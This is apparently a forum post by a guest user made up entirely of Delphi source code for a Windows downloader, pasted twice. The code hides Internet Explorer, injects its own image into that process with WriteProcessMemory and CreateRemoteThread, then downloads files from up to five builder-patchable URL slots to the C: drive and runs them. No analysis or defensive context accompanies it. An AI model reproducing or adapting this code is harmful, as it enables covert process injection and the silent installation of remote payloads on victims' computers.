S
sulwan
Unregistered / Unconfirmed
GUEST, unregistred user!
program main;
{$IMAGEBASE $13140000}
uses
Windows;
{$L 'SRT.obj'}
const
Buffer1: PChar= 'AXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer2: PChar= 'BXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer3: PChar= 'CXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer4: PChar= 'DXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer5: PChar= 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
var
ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer): Cardinal; stdcall;
DownFile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved: LongWord; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle;
var
Runl: PChar;
WINXP: PChar;
procedure Downain; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@DownFile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');
Downfile(nil, Runl, WINXP, 0, nil);
ShellRun(0, 'open', WINXP, nil, nil, 5);
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
Module := Pointer(GetModuleHandle(nil));
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject;
var
ProcessHandle, PID: longword;
begin
winexec('C:/Program Files/Internet Explorer/IEXPLORE.EXE', sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Downain);
CloseHandle(ProcessHandle);
end;
begin
if Buffer1 <> 'NO' then
begin
Runl := Buffer1;
WINXP :='c:/12.EXE';
RunInject;
end;
if Buffer2 <> 'NO' then
begin
Runl := Buffer2;
WINXP :='c:/dir.EXE';
RunInject;
end;
if Buffer3 <> 'NO' then
begin
Runl := Buffer3;
WINXP :='c:/cmd.EXE';
RunInject;
end;
if Buffer4 <> 'NO' then
begin
Runl := Buffer4;
WINXP :='c:/root.EXE';
RunInject;
end;
if Buffer5 <> 'NO' then
begin
Runl := Buffer5;
WINXP :='c:/diy.EXE';
RunInject;
end;
end.
{$IMAGEBASE $13140000}
uses
Windows;
{$L 'SRT.obj'}
const
Buffer1: PChar= 'AXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer2: PChar= 'BXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer3: PChar= 'CXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer4: PChar= 'DXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer5: PChar= 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
var
ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer): Cardinal; stdcall;
DownFile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved: LongWord; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle;
var
Runl: PChar;
WINXP: PChar;
procedure Downain; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@DownFile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');
Downfile(nil, Runl, WINXP, 0, nil);
ShellRun(0, 'open', WINXP, nil, nil, 5);
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
Module := Pointer(GetModuleHandle(nil));
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject;
var
ProcessHandle, PID: longword;
begin
winexec('C:/Program Files/Internet Explorer/IEXPLORE.EXE', sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Downain);
CloseHandle(ProcessHandle);
end;
begin
if Buffer1 <> 'NO' then
begin
Runl := Buffer1;
WINXP :='c:/12.EXE';
RunInject;
end;
if Buffer2 <> 'NO' then
begin
Runl := Buffer2;
WINXP :='c:/dir.EXE';
RunInject;
end;
if Buffer3 <> 'NO' then
begin
Runl := Buffer3;
WINXP :='c:/cmd.EXE';
RunInject;
end;
if Buffer4 <> 'NO' then
begin
Runl := Buffer4;
WINXP :='c:/root.EXE';
RunInject;
end;
if Buffer5 <> 'NO' then
begin
Runl := Buffer5;
WINXP :='c:/diy.EXE';
RunInject;
end;
end.